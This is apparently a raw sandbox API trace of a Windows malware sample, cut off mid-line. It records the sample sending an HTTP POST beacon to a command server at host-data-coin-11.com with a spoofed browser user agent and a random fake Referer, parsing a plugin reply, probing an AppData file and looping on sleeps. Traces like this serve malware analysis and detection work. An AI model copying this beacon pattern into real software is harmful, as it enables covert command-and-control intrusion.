RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x524718ab [0109.672] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4b0594e5 [0109.672] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4b0594e5 [0109.672] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x40023a78 [0109.672] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x11ff9f00 [0109.672] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x15fd6eed [0109.672] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x66f7491d [0109.672] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x68d7a9c9 [0109.672] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1f97f32 [0109.672] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x24c6cc82 [0109.673] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xb9ad8e1 [0109.673] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x330bce21 [0109.673] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x15d24c4c [0109.673] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x51f7f323 [0109.673] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x10e42f40 [0109.673] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5ccafd21 [0109.673] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x23d54f1b [0109.673] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x79ba3364 [0109.673] RtlAllocateHeap (HeapHandle=0x82f0000, Flags=0x8, Size=0x95) returned 0x82f2380 [0109.673] lstrcatA (in: lpString1="", lpString2="4BCD659AD8F347B5B451918CD891C8238443A5AF" | out: lpString1="4BCD659AD8F347B5B451918CD891C8238443A5AF") returned="4BCD659AD8F347B5B451918CD891C8238443A5AF" [0109.673] lstrcatA (in: lpString1="", lpString2="Q9IATRKPRH" | out: lpString1="Q9IATRKPRH") returned="Q9IATRKPRH" [0109.673] lstrcatA (in: lpString1="", lpString2="pub2" | out: lpString1="pub2") returned="pub2" [0109.673] lstrcatA (in: lpString1="", lpString2="m\"`GHCqfv@]4%gt-79gO+`;aYA=\\B02n,[)\"=f@2JY)`ddC;6\">U=r@)r+vf)" | out: lpString1="m\"`GHCqfv@]4%gt-79gO+`;aYA=\\B02n,[)\"=f@2JY)`ddC;6\">U=r@)r+vf)") returned="m\"`GHCqfv@]4%gt-79gO+`;aYA=\\B02n,[)\"=f@2JY)`ddC;6\">U=r@)r+vf)" [0109.673] RtlAllocateHeap (HeapHandle=0x82f0000, Flags=0x8, Size=0x10c) returned 0x82f2420 [0109.673] lstrlenA (lpString="http://host-data-coin-11.com/") returned 29 [0109.673] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x82f2300, cbMultiByte=30, lpWideCharStr=0x82f2420, cchWideChar=60 | out: lpWideCharStr="http://host-data-coin-11.com/") returned 30 [0109.673] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x814f518 | out: pProxyConfig=0x814f518) returned 1 [0109.751] WinHttpOpen (pszAgentW="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x3fb0120 [0109.791] WinHttpCrackUrl (in: pwszUrl="http://host-data-coin-11.com/", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x814f5d0 | out: lpUrlComponents=0x814f5d0) returned 1 [0109.791] WinHttpConnect (hSession=0x3fb0120, pswzServerName="host-data-coin-11.com", nServerPort=0x50, dwReserved=0x0) returned 0x3faa0e0 [0109.813] RtlAllocateHeap (HeapHandle=0x82f0000, Flags=0x8, Size=0x12) returned 0x82f2540 [0109.813] RtlAllocateHeap (HeapHandle=0x82f0000, Flags=0x8, Size=0x68) returned 0x82f2560 [0109.813] WinHttpOpenRequest (hConnect=0x3faa0e0, pwszVerb="POST", pwszObjectName="/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x0) returned 0x6e9ada0 [0109.814] RtlAllocateHeap (HeapHandle=0x82f0000, Flags=0x8, Size=0x4e) returned 0x82f25d0 [0109.814] RtlAllocateHeap (HeapHandle=0x82f0000, Flags=0x8, Size=0x10d) returned 0x82f2630 [0109.814] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3c413cb4 [0109.814] RtlAllocateHeap (HeapHandle=0x82f0000, Flags=0x8, Size=0x12) returned 0x82f2750 [0109.814] RtlAllocateHeap (HeapHandle=0x82f0000, Flags=0x8, Size=0x17) returned 0x82f2770 [0109.814] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x742e3316 [0109.814] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3ac90b08 [0109.814] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x27107733 [0109.814] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x436214a4 [0109.814] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xe537da5 [0109.814] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x28414bbf [0109.814] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5aaf32cc [0109.814] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7d2fecbe [0109.814] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3dbf514 [0109.814] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x18c27088 [0109.814] wsprintfW (in: param_1=0x82f2630, param_2="Accept: */*\r\nReferer: http://%S%s/" | out: param_1="Accept: */*\r\nReferer: http://npjcvtxwb.net/") returned 43 [0109.814] RtlSizeHeap (HeapHandle=0x82f0000, Flags=0x0, MemoryPointer=0x82f2770) returned 0x17 [0109.814] RtlFreeHeap (HeapHandle=0x82f0000, Flags=0x0, BaseAddress=0x82f2770) returned 1 [0109.814] RtlSizeHeap (HeapHandle=0x82f0000, Flags=0x0, MemoryPointer=0x82f2750) returned 0x12 [0109.814] RtlFreeHeap (HeapHandle=0x82f0000, Flags=0x0, BaseAddress=0x82f2750) returned 1 [0109.814] RtlSizeHeap (HeapHandle=0x82f0000, Flags=0x0, MemoryPointer=0x82f25d0) returned 0x4e [0109.815] RtlFreeHeap (HeapHandle=0x82f0000, Flags=0x0, BaseAddress=0x82f25d0) returned 1 [0109.815] WinHttpAddRequestHeaders (hRequest=0x6e9ada0, pwszHeaders="Accept: */*\r\nReferer: http://npjcvtxwb.net/", dwHeadersLength=0xffffffff, dwModifiers=0x20000000) returned 1 [0109.815] WinHttpSendRequest (hRequest=0x6e9ada0, lpszHeaders="Content-Type: application/x-www-form-urlencoded", dwHeadersLength=0x0, lpOptional=0x82f2380*, dwOptionalLength=0x8c, dwTotalLength=0x8c, dwContext=0x0) returned 1 [0110.266] WinHttpReceiveResponse (hRequest=0x6e9ada0, lpReserved=0x0) returned 1 [0110.266] RtlAllocateHeap (HeapHandle=0x82f0000, Flags=0x8, Size=0x2800) returned 0x82f2750 [0110.267] WinHttpReadData (in: hRequest=0x6e9ada0, lpBuffer=0x82f2750, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x814f688 | out: lpBuffer=0x82f2750*, lpdwNumberOfBytesRead=0x814f688*=0x18) returned 1 [0110.268] RtlReAllocateHeap (Heap=0x82f0000, Flags=0x8, Ptr=0x82f2750, Size=0x5000) returned 0x82f4f60 [0110.269] WinHttpReadData (in: hRequest=0x6e9ada0, lpBuffer=0x82f4f78, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x814f688 | out: lpBuffer=0x82f4f78*, lpdwNumberOfBytesRead=0x814f688*=0x0) returned 1 [0110.269] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x36e0000 [0110.270] RtlFreeHeap (HeapHandle=0x82f0000, Flags=0x0, BaseAddress=0x82f4f60) returned 1 [0110.271] WinHttpCloseHandle (hInternet=0x6e9ada0) returned 1 [0110.271] RtlSizeHeap (HeapHandle=0x82f0000, Flags=0x0, MemoryPointer=0x82f2630) returned 0x10d [0110.271] RtlFreeHeap (HeapHandle=0x82f0000, Flags=0x0, BaseAddress=0x82f2630) returned 1 [0110.271] WinHttpCloseHandle (hInternet=0x3faa0e0) returned 1 [0110.271] RtlSizeHeap (HeapHandle=0x82f0000, Flags=0x0, MemoryPointer=0x82f2560) returned 0x68 [0110.271] RtlFreeHeap (HeapHandle=0x82f0000, Flags=0x0, BaseAddress=0x82f2560) returned 1 [0110.271] RtlSizeHeap (HeapHandle=0x82f0000, Flags=0x0, MemoryPointer=0x82f2540) returned 0x12 [0110.271] RtlFreeHeap (HeapHandle=0x82f0000, Flags=0x0, BaseAddress=0x82f2540) returned 1 [0110.271] WinHttpCloseHandle (hInternet=0x3fb0120) returned 1 [0110.271] RtlSizeHeap (HeapHandle=0x82f0000, Flags=0x0, MemoryPointer=0x82f2420) returned 0x10c [0110.272] RtlFreeHeap (HeapHandle=0x82f0000, Flags=0x0, BaseAddress=0x82f2420) returned 1 [0110.272] RtlSizeHeap (HeapHandle=0x82f0000, Flags=0x0, MemoryPointer=0x82f2330) returned 0x46 [0110.272] RtlFreeHeap (HeapHandle=0x82f0000, Flags=0x0, BaseAddress=0x82f2330) returned 1 [0110.272] RtlSizeHeap (HeapHandle=0x82f0000, Flags=0x0, MemoryPointer=0x82f2380) returned 0x95 [0110.272] RtlFreeHeap (HeapHandle=0x82f0000, Flags=0x0, BaseAddress=0x82f2380) returned 1 [0110.272] lstrlenA (lpString="ä\x070|:|plugin_size=0") returned 19 [0110.272] RtlAllocateHeap (HeapHandle=0x82f0000, Flags=0x8, Size=0x15) returned 0x82f2330 [0110.273] lstrlenA (lpString="0|:|plugin_size=0") returned 17 [0110.273] lstrlenA (lpString="plugin_size") returned 11 [0110.273] atoi (_Str="0") returned 0 [0110.273] lstrlenA (lpString="0|:|plugin_size=0") returned 17 [0110.273] lstrlenA (lpString="|:|") returned 3 [0110.273] MapViewOfFile (hFileMappingObject=0x1490, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8610000 [0110.289] lstrcatA (in: lpString1="", lpString2="plugin_size=0" | out: lpString1="plugin_size=0") returned="plugin_size=0" [0110.289] NtUnmapViewOfSection (ProcessHandle=0xffffffffffffffff, BaseAddress=0x8610000) returned 0x0 [0110.932] atoi (_Str="0") returned 0 [0110.932] VirtualFree (lpAddress=0x36e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0110.933] RtlSizeHeap (HeapHandle=0x82f0000, Flags=0x0, MemoryPointer=0x82f2300) returned 0x26 [0110.933] RtlFreeHeap (HeapHandle=0x82f0000, Flags=0x0, BaseAddress=0x82f2300) returned 1 [0110.933] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\estugfj" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\estugfj"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0110.933] Sleep (dwMilliseconds=0x258) [0111.527] Sleep (dwMilliseconds=0x258) [0112.167] Sleep (dwMilliseconds=0x258) [0112.775] Sleep (dwMilliseconds=0x258) [0113.384] Sleep (dwMilliseconds=0x258) [0114.009] Sleep (dwMilliseconds=0x258) [0114.616] Sleep (dwMilliseconds=0x258) [0115.226] Sleep (dwMilliseconds=0x258) [0115.864] Sleep (dwMilliseconds=0x258) [0116.509] Sleep (dwMilliseconds=0x258) [0117.128] Sleep (dwMilliseconds=0x258) [0117.767] Sleep (dwMilliseconds=0x258) [0118.376] Sleep (dwMilliseconds=0x258) [0118.985] Sleep (dwMilliseconds=0x258) [0119.967] Sleep (dwMilliseconds=0x258) [0121.241] Sleep (dwMilliseconds=0x258) [0122.713] Sleep (dwMilliseconds=0x258) [0123.352] Sleep (dwMilliseconds=0x258) [0123.371] Sleep (dwMilliseconds=0x258) [0123.384] Sleep (dwMilliseconds=0x258) [0123.400] Sleep (dwMilliseconds=0x258) [0123.414] Sleep (dwMilliseconds=0x258) [0123.430] Sleep (dwMilliseconds=0x258) [0123.447] Sleep (dwMilliseconds=0x258) [0123.464] Sleep (dwMilliseconds=0x258) [0123.523] Sleep (dwMilliseconds=0x258) [0123.546] Sleep (dwMilliseconds=0x258) [0123.555] Sleep (dwMilliseconds=0x258) [0123.570] Sleep (dwMilliseconds=0x258) [0123.586] Sleep (dwMilliseconds=0x258) [0123.601] Sleep (dwMilliseconds=0x258) [0123.618] Sleep (dwMilliseconds=0x258) [0123.633] Sleep (dwMilliseconds=0x258) [0123.695] Sleep (dwMilliseconds=0x258) [0123.711] Sleep (dwMilliseconds=0x258) [0123.727] Sleep (dwMilliseconds=0x258) [0123.742] Sleep (dwMilliseconds=0x258) [0123.757] Sleep (dwMilliseconds=0x258) [0123.773] Sleep (dwMilliseconds=0x258) [0123.789] Sleep (dwMilliseconds=0x258) [0123.852] Sleep (dwMilliseconds=0x258) [0123.867] Sleep (dwMilliseconds=0x258) [0123.882] Sleep (dwMilliseconds=0x258) [0123.898] Sleep (dwMilliseconds=0x258) [0123.927] Sleep (dwMilliseconds=0x258) [0123.929] Sleep (dwMilliseconds=0x258) [0123.945] Sleep (dwMilliseconds=0x258) [0124.007] Sleep (dwMilliseconds=0x258) [0124.023] Sleep (dwMilliseconds=0x258) [0124.038] Sleep (dwMilliseconds=0x258) [0124.054] Sleep (dwMilliseconds=0x258) [0124.070] Sleep (dwMilliseconds=0x258) [0124.085] Sleep (dwMilliseconds=0x258) [0124.101] Sleep (dwMilliseconds=0x258) [0124.163] Sleep (dwMilliseconds=0x258) [0124.179] Sleep (dwMilliseconds=0x258) [0124.194] Sleep (dwMilliseconds=0x258) [0124.210] Sleep (dwMilliseconds=0x258) [0124.225] Sleep (dwMilliseconds=0x258) [0124.241] Sleep (dwMilliseconds=0x258) [0124.257] Sleep (dwMilliseconds=0x258) [0124.319] Sleep (dwMilliseconds=0x258) [0124.335] Sleep (dwMilliseconds=0x258) [0124.350] Sleep (dwMilliseconds=0x258) [0124.366] Sleep (dwMilliseconds=0x258) [0124.381] Sleep (dwMilliseconds=0x258) [0124.398] Sleep (dwMilliseconds=0x258) [0124.413] Sleep (dwMilliseconds=0x258) [0124.475] Sleep (dwMilliseconds=0x258) [0124.491] Sleep (dwMilliseconds=0x258) [0124.507] Sleep (dwMilliseconds=0x258) [0124.522] Sleep (dwMilliseconds=0x258) [0124.539] Sleep (dwMilliseconds=0x258) [0124.553] Sleep (dwMilliseconds=0x258) [0124.569] Sleep (dwMilliseconds=0x258) [0124.632] Sleep (dwMilliseconds=0x258) [0124.647] Sleep (dwMilliseconds=0x258) [0124.662] Sleep (dwMilliseconds=0x258) [0124.678] Sleep (dwMilliseconds=0x258) [0124.693] Sleep (dwMilliseconds=0x258) [0124.709] Sleep (dwMilliseconds=0x258) [0124.725] Sleep (dwMilliseconds=0x258) [0124.787] Sleep (dwMilliseconds=0x258) [0124.807] Sleep (dwMilliseconds=0x258) [0124.818] Sleep (dwMilliseconds=0x258) [0124.834] Sleep (dwMilliseconds=0x258) [0124.850] Sleep (dwMilliseconds=0x258) [0124.865] Sleep (dwMilliseconds=0x258) [0124.881] Sleep (dwMilliseconds=0x258) [0124.944] Sleep (dwMilliseconds=0x258) [0124.959] Sleep (dwMilliseconds=0x258) [0124.974] Sleep (dwMilliseconds=0x258) [0124.990] Sleep (dwMilliseconds=0x258) [0125.006] Sleep (dwMilliseconds=0x258) [0125.021] Sleep (dwMilliseconds=0x258) [0125.037] Sleep (dwMilliseconds=0x258) [0125.055] Sleep (dwMilliseconds=0x258) [0125.115] Sleep (dwMilliseconds=0x258) [0125.138] Sleep (dwMilliseconds=0x258) [0125.146] Sleep (dwMilliseconds=0x258) [0125.161] Sleep (dwMilliseconds=0x258) [0125.184] Sleep (dwMilliseconds=0x258) [0125.193] Sleep (dwMilliseconds=0x258) [0125.208] Sleep (dwMilliseconds=0x258) [0125.224] Sleep (dwMilliseconds=0x258) [0125.287] Sleep (dwMilliseconds=0x258) [0125.305] Sleep (dwMilliseconds=0x258) [0125.317] Sleep (dwMilliseconds=0x258) [0125.334] Sleep (dwMilliseconds=0x258) [0125.349] Sleep (dwMilliseconds=0x258) [0125.364] Sleep (dwMilliseconds=0x258) [0125.380] Sleep (dwMilliseconds=0x258) [0125.396] Sleep (dwMilliseconds=0x258) [0125.458] Sleep (dwMilliseconds=0x258) [0125.474] Sleep (dwMilliseconds=0x258) [0125.489] Sleep (dwMilliseconds=0x258) [0125.506] Sleep (dwMilliseconds=0x258) [0125.534] Sleep (dwMilliseconds=0x258) [0125.579] Sleep (dwMilliseconds=0x258) [0125.630] Sleep (dwMilliseconds=0x258) [0125.663] Sleep (dwMilliseconds=0x258) [0125.676] Sleep (dwMilliseconds=0x258) [0125.692] Sleep (dwMilliseconds=0x258) [0125.708] Sleep (dwMilliseconds=0x258) [0125.723] Sleep (dwMilliseconds=0x258) [0125.739] Sleep (dwMilliseconds=0x258) [0125.754] Sleep (dwMilliseconds=0x258) [0125.818] Sleep (dwMilliseconds=0x258) [0125.834] Sleep (dwMilliseconds=0x258) [0125.848] Sleep (dwMilliseconds=0x258) [0125.863] Sleep (dwMilliseconds=0x258) [0125.879] Sleep (dwMilliseconds=0x258) [0125.895] Sleep (dwMilliseconds=0x258) [0125.920] Sleep (dwMilliseconds=0x258) [0125.926] Sleep (dwMilliseconds=0x258) [0125.973] Sleep (dwMilliseconds=0x258) [0125.998] Sleep (dwMilliseconds=0x258) [0126.004] Sleep (dwMilliseconds=0x258) [0126.019] Sleep (dwMilliseconds=0x258) [0126.036] Sleep (dwMilliseconds=0x258) [0126.051] Sleep (dwMilliseconds=0x258) [0126.066] Sleep (dwMilliseconds=0x258) [0126.082] Sleep (dwMilliseconds=0x258) [0126.147] Sleep (dwMilliseconds=0x258) [0126.160] Sleep (dwMilliseconds=0x258) [0126.175] Sleep (dwMilliseconds=0x258) [0126.191] Sleep (dwMilliseconds=0x258) [0126.207] Sleep (dwMilliseconds=0x258) [0126.222] Sleep (dwMilliseconds=0x258) [0126.238] Sleep (dwMilliseconds=0x258) [0126.300] Sleep (dwMilliseconds=0x258) [0126.316] Sleep (dwMilliseconds=0x258) [0126.331] Sleep (dwMilliseconds=0x258) [0126.347] Sleep (dwMilliseconds=0x258) [0126.363] Sleep (dwMilliseconds=0x258) [0126.378] Sleep (dwMilliseconds=0x258) [0126.394] Sleep (dwMilliseconds=0x258) [0126.456] Sleep (dwMilliseconds=0x258) [0126.472] Sleep (dwMilliseconds=0x258) [0126.487] Sleep (dwMilliseconds=0x258) [0126.503] Sleep (dwMilliseconds=0x258) [0126.519] Sleep (dwMilliseconds=0x258) [0126.534] Sleep (dwMilliseconds=0x258) [0126.550] Sleep (dwMilliseconds=0x258) [0126.612] Sleep (dwMilliseconds=0x258) [0126.633] Sleep (dwMilliseconds=0x258) [0126.643] Sleep (dwMilliseconds=0x258) [0126.659] Sleep (dwMilliseconds=0x258) [0126.675] Sleep (dwMilliseconds=0x258) [0126.690] Sleep (dwMilliseconds=0x258) [0126.706] Sleep (dwMilliseconds=0x258) [0126.723] Sleep (dwMilliseconds=0x258) [0126.785] Sleep (dwMilliseconds=0x258) [0126.799] Sleep (dwMilliseconds=0x258) [0126.815] Sleep (dwMilliseconds=0x258) [0126.831] Sleep (dwMilliseconds=0x258) [0126.846] Sleep (dwMilliseconds=0x258) [0126.862] Sleep (dwMilliseconds=0x258) [0126.881] Sleep (dwMilliseconds=0x258) [0126.971] Sleep (dwMilliseconds=0x258) [0126.998] Sleep (dwMilliseconds=0x258) [0127.004] Sleep (dwMilliseconds=0x258) [0127.018] Sleep (dwMilliseconds=0x258) [0127.033] Sleep (dwMilliseconds=0x258) [0127.049] Sleep (dwMilliseconds=0x258) [0127.065] Sleep (dwMilliseconds=0x258) [0127.080] Sleep (dwMilliseconds=0x258) [0127.143] Sleep (dwMilliseconds=0x258) [0127.158] Sleep (dwMilliseconds=0x258) [0127.174] Sleep (dwMilliseconds=0x258) [0127.190] Sleep (dwMilliseconds=0x258) [0127.216] Sleep (dwMilliseconds=0x258) [0127.222] Sleep (dwMilliseconds=0x258) [0127.236] Sleep (dwMilliseconds=0x258) [0127.299] Sleep (dwMilliseconds=0x258) [0127.320] Sleep (dwMilliseconds=0x258) [0127.330] Sleep (dwMilliseconds=0x258) [0127.347] Sleep (dwMilliseconds=0x258) [0127.361] Sleep (dwMilliseconds=0x258) [0127.377] Sleep (dwMilliseconds=0x258) [0127.392] Sleep (dwMilliseconds=0x258) [0127.408] Sleep (dwMilliseconds=0x258) [0127.470] Sleep (dwMilliseconds=0x258) [0127.486] Sleep (dwMilliseconds=0x258) [0127.505] Sleep (dwMilliseconds=0x258) [0127.519] Sleep (dwMilliseconds=0x258) [0127.533] Sleep (dwMilliseconds=0x258) [0127.548] Sleep (dwMilliseconds=0x258) [0127.564] Sleep (dwMilliseconds=0x258) [0127.626] Sleep (dwMilliseconds=0x258) [0127.649] Sleep (dwMilliseconds=0x258) [0127.657] Sleep (dwMilliseconds=0x258) [0127.673] Sleep (dwMilliseconds=0x258) [0127.689] Sleep (dwMilliseconds=0x258) [0127.704] Sleep (dwMilliseconds=0x258) [0127.720] Sleep (dwMilliseconds=0x258) [0127.736] Sleep (dwMilliseconds=0x258) [0127.798] Sleep (dwMilliseconds=0x258) [0127.814] Sleep (dwMilliseconds=0x258) [0127.829] Sleep (dwMilliseconds=0x258) [0127.845] Sleep (dwMilliseconds=0x258) [0127.861] Sleep (dwMilliseconds=0x258) [0127.876] Sleep (dwMilliseconds=0x258) [0127.891] Sleep (dwMilliseconds=0x258) [0127.954] Sleep (dwMilliseconds=0x258) [0127.975] Sleep (dwMilliseconds=0x258) [0127.985] Sleep (dwMilliseconds=0x258) [0128.002] Sleep (dwMilliseconds=0x258) [0128.016] Sleep (dwMilliseconds=0x258) [0128.032] Sleep (dwMilliseconds=0x258) [0128.047] Sleep (dwMilliseconds=0x258) [0128.063] Sleep (dwMilliseconds=0x258) [0128.125] Sleep (dwMilliseconds=0x258) [0128.141] Sleep (dwMilliseconds=0x258) [0128.157] Sleep (dwMilliseconds=0x258) [0128.172] Sleep (dwMilliseconds=0x258) [0128.188] Sleep (dwMilliseconds=0x258) [0128.207] Sleep (dwMilliseconds=0x258) [0128.219] Sleep (dwMilliseconds=0x258) [0128.281] Sleep (dwMilliseconds=0x258) [0128.298] Sleep (dwMilliseconds=0x258) [0128.319] Sleep (dwMilliseconds=0x258) [0128.328] Sleep (dwMilliseconds=0x258) [0128.344] Sleep (dwMilliseconds=0x258) [0128.359] Sleep (dwMilliseconds=0x258) [0128.375] Sleep (dwMilliseconds=0x258) [0128.437] Sleep (dwMilliseconds=0x258) [0128.453] Sleep (dwMilliseconds=0x258) [0128.469] Sleep (dwMilliseconds=0x258) [0128.488] Sleep (dwMilliseconds=0x258) [0128.502] Sleep (dwMilliseconds=0x258) [0128.515] Sleep (dwMilliseconds=0x258) [0128.532] Sleep (dwMilliseconds=0x258) [0128.593] Sleep (dwMilliseconds=0x258) [0128.609] Sleep (dwMilliseconds=0x258) [0128.626] Sleep (dwMilliseconds=0x258) [0128.641] Sleep (dwMilliseconds=0x258) [0128.656] Sleep (dwMilliseconds=0x258) [0128.671] Sleep (dwMilliseconds=0x258) [0128.687] Sleep (dwMilliseconds=0x258) [0128.750] Sleep (dwMilliseconds=0x258) [0128.765] Sleep (dwMilliseconds=0x258) [0128.781] Sleep (dwMilliseconds=0x258) [0128.796] Sleep (dwMilliseconds=0x258) [0128.812] Sleep (dwMilliseconds=0x258) [0128.827] Sleep (dwMilliseconds=0x258) [0128.843] Sleep (dwMilliseconds=0x258) [0128.914] Sleep (dwMilliseconds=0x258) [0128.926] Sleep (dwMilliseconds=0x258) [0128.937] Sleep (dwMilliseconds=0x258) [0128.952] Sleep (dwMilliseconds=0x258) [0128.969] Sleep (dwMilliseconds=0x258) [0128.984] Sleep (dwMilliseconds=0x258) [0128.999] Sleep (dwMilliseconds=0x258) [0129.015] Sleep (dwMilliseconds=0x258) [0129.062] Sleep (dwMilliseconds=0x258) [0129.089] Sleep (dwMilliseconds=0x258) [0129.093] Sleep (dwMilliseconds=0x258) [0129.108] Sleep (dwMilliseconds=0x258) [0129.124] Sleep (dwMilliseconds=0x258) [0129.142] Sleep (dwMilliseconds=0x258) [0129.155] Sleep (dwMilliseconds=0x258) [0129.171] Sleep (dwMilliseconds=0x258) [0129.234] Sleep (dwMilliseconds=0x258) [0129.249] Sleep (dwMilliseconds=0x258) [0129.264] Sleep (dwMilliseconds=0x258) [0129.280] Sleep (dwMilliseconds=0x258) [0129.295] Sleep (dwMilliseconds=0x258) [0129.311] Sleep (dwMilliseconds=0x258) [0129.327] Sleep (dwMilliseconds=0x258) [0129.375] Sleep (dwMilliseconds=0x258) [0129.413] Sleep (dwMilliseconds=0x258) [0129.420] Sleep (dwMilliseconds=0x258) [0129.437] Sleep (dwMilliseconds=0x258) [0129.452] Sleep (dwMilliseconds=0x258) [0129.467] Sleep (dwMilliseconds=0x258) [0129.483] Sleep (dwMilliseconds=0x258) [0129.498] Sleep (dwMilliseconds=0x258) [0129.561] Sleep (dwMilliseconds=0x258) [0129.576] Sleep (dwMilliseconds=0x258) [0129.592] Sleep (dwMilliseconds=0x258) [0129.607] Sleep (dwMilliseconds=0x258) [0129.623] Sleep (dwMilliseconds=0x258) [0129.639] Sleep (dwMilliseconds=0x258) [0129.658] Sleep (dwMilliseconds=0x258) [0129.717] Sleep (dwMilliseconds=0x258) [0129.732] Sleep (dwMilliseconds=0x258) [0129.748] Sleep (dwMilliseconds=0x258) [0129.763] Sleep (dwMilliseconds=0x258) [0129.780] Sleep (dwMilliseconds=0x258) [0129.795] Sleep (dwMilliseconds=0x258) [0129.810] Sleep (dwMilliseconds=0x258) [0129.873] Sleep (dwMilliseconds=0x258) [0129.889] Sleep (dwMilliseconds=0x258) [0129.913] Sleep (dwMilliseconds=0x258) [0129.919] Sleep (dwMilliseconds=0x258) [0129.935] Sleep (dwMilliseconds=0x258) [0129.951] Sleep (dwMilliseconds=0x258) [0129.966] Sleep (dwMilliseconds=0x258) [0130.015] Sleep (dwMilliseconds=0x258) [0130.040] Sleep (dwMilliseconds=0x258) [0130.045] Sleep (dwMilliseconds=0x258) [0130.060] Sleep (dwMilliseconds=0x258) [0130.075] Sleep (dwMilliseconds=0x258) [0130.092] Sleep (dwMilliseconds=0x258) [0130.107] Sleep (dwMilliseconds=0x258) [0130.123] Sleep (dwMilliseconds=0x258) [0130.171] Sleep (dwMilliseconds=0x258) [0130.195] Sleep (dwMilliseconds=0x258) [0130.200] Sleep (dwMilliseconds=0x258) [0130.216] Sleep (dwMilliseconds=0x258) [0130.232] Sleep (dwMilliseconds=0x258) [0130.247] Sleep (dwMilliseconds=0x258) [0130.263] Sleep (dwMilliseconds=0x258) [0130.278] Sleep (dwMilliseconds=0x258) [0130.341] Sleep (dwMilliseconds=0x258) [0130.360] Sleep (dwMilliseconds=0x258) [0130.372] Sleep (dwMilliseconds=0x258) [0130.388] Sleep (dwMilliseconds=0x258) [0130.412] Sleep (dwMilliseconds=0x258) [0130.419] Sleep (dwMilliseconds=0x258) [0130.434] Sleep (dwMilliseconds=0x258) [0130.450] Sleep (dwMilliseconds=0x258) [0130.497] Sleep (dwMilliseconds=0x258) [0130.529] Sleep (dwMilliseconds=0x258) [0130.543] Sleep (dwMilliseconds=0x258) [0130.559] Sleep (dwMilliseconds=0x258) [0130.575] Sleep (dwMilliseconds=0x258) [0130.590] Sleep (dwMilliseconds=0x258) [0130.606] Sleep (dwMilliseconds=0x258) [0130.622] Sleep (dwMilliseconds=0x258) [0130.687] Sleep (dwMilliseconds=0x258) [0130.699] Sleep (dwMilliseconds=0x258) [0130.730] Sleep (dwMilliseconds=0x258) [0130.730] Sleep (dwMilliseconds=0x258) [0130.746] Sleep (dwMilliseconds=0x258) [0130.762] Sleep (dwMilliseconds=0x258) [0130.777] Sleep (dwMilliseconds=0x258) [0130.840] Sleep (dwMilliseconds=0x258) [0130.855] Sleep (dwMilliseconds=0x258) [0130.871] Sleep (dwMilliseconds=0x258) [0130.887] Sleep (dwMilliseconds=0x258) [0130.922] Sleep (dwMilliseconds=0x258) [0130.933] Sleep (dwMilliseconds=0x258) [0130.996] Sleep (dwMilliseconds=0x258) [0131.011] Sleep (dwMilliseconds=0x258) [0131.027] Sleep (dwMilliseconds=0x258) [0131.043] Sleep (dwMilliseconds=0x258) [0131.059] Sleep 